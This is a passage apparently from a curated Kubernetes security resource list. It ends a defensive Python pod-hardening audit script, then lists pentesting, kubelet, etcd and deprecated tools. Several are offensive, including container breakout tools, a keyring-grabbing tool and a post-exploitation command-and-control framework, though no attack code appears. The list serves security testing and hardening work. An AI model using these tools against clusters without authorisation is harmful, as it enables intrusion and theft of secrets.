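    "metadata": {"name": "web"},
    "spec": {
        "automountServiceAccountToken": False,
        "securityContext": {"runAsNonRoot": True},
        "volumes": [{"name": "tmp", "emptyDir": {}}],
        "containers": [{"name": "web", "image": "nginx",
                        "securityContext": {"allowPrivilegeEscalation": False, "privileged": False,
                                            "capabilities": {"drop": ["ALL"]}}}],
    },
}

if __name__ == "__main__":
    for pod in (BAD_POD, HARDENED_POD):
        fs = audit_pod(pod)
        print(pod["metadata"]["name"], max_severity(fs))
        for sev, check, msg in fs:
            print(f"  [{sev}] {check}: {msg}")
```

To audit a whole namespace, iterate over the `items` of `kubectl get pods -n <ns> -o json` and call `audit_pod` on each; the same checks map directly onto the `restricted` profile of Pod Security Admission, which is the enforcement mechanism to turn on once the findings are cleared.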

#### Kubernetes Penetration Testing Tools

- peirates - Kubernetes container breakout tool
- kdigger - Kubernetes breakout/discovery tool
- teisteanas - Tool to create kubeconfig files based on the CertificateSigningRequest API
- tòcan - Tool to create kubeconfig files based on the TokenRequest API
- MKAT - Managed Kubernetes Auditing Tool. Focuses on exploring security issues in managed Kubernetes (e.g. EKS)
- Kubehound - KubeHound creates a graph of attack paths in a Kubernetes cluster
- IceKube - Kubernetes attack path evaluation tool
- namespacehound - Tool to test a cluster for possible namespace breakouts where multi-tenancy is in use

#### Kubelet Tools

- kubeletctl - This is a good tool to automate the process of assessing a kubelet instance. If the instance is vulnerable it can also carry out some exploit tasks
- kubelet dumper - PoC tool to dump Kubelet configurations for review

#### etcd Tools

- auger - Tool for decoding information pulled directly from the etcd database

### Security Observability Tools

### Training Tools

If you're looking to practice with some of the tools here, in a safe environment, there are projects to help with that.

#### Kubernetes Honeypot projects

### Kubernetes Security Improvement Tools

### Deprecated/Unmaintained Tools

Inevitably over time, some tools will become unmaintained and deprecated. Whilst they may still work ok, caution is needed. If I've listed you here and you're not deprecated just open an issue to move it back :)

- kube-hunter - Tool to test and exploit standard Kubernetes security vulnerabilities
- kubectl-who-can - Tool that lets you ask "who can" do things in RBAC, e.g. who can get secrets
- rakkess - Shows the RBAC permissions available to a user as a list
- rback - Tool for graphical representation of RBAC permissions in a Kubernetes cluster
- amicontained - Will show you information about the container runtime and rights you have
- ConMachi - Pentester focused container attack surface assessment tool
- botb - Container breakout assessment tool. Can automatically exploit common issues like the Docker socket mount
- keyctl-unmask - Tool that specifically focuses on grabbing kernel keyring entries from containers that allow the keyctl syscall
- go-pillage-registries - Tool to search the manifests and configuration for images in a registry for potentially sensitive information
- reg - Tool for interacting with container registries
- Whaler - Tool to reverse Docker images into Dockerfiles
- RBAC Police - RBAC policy evaluation
- kubestrike - Security auditing tool for Kubernetes; covers authenticated and unauthenticated scanning
- kubestroyer - Kubernetes pentesting tool
- kubestalk - Black-box Kubernetes pentesting tool
- kubedagger - Kubernetes offensive framework built in eBPF
- kubesploit - Kubesploit is a cross-platform post-exploitation HTTP/2 Command & Control server and agent written in Golang, focused on containerized environments
- k8spot - Kubernetes honeypot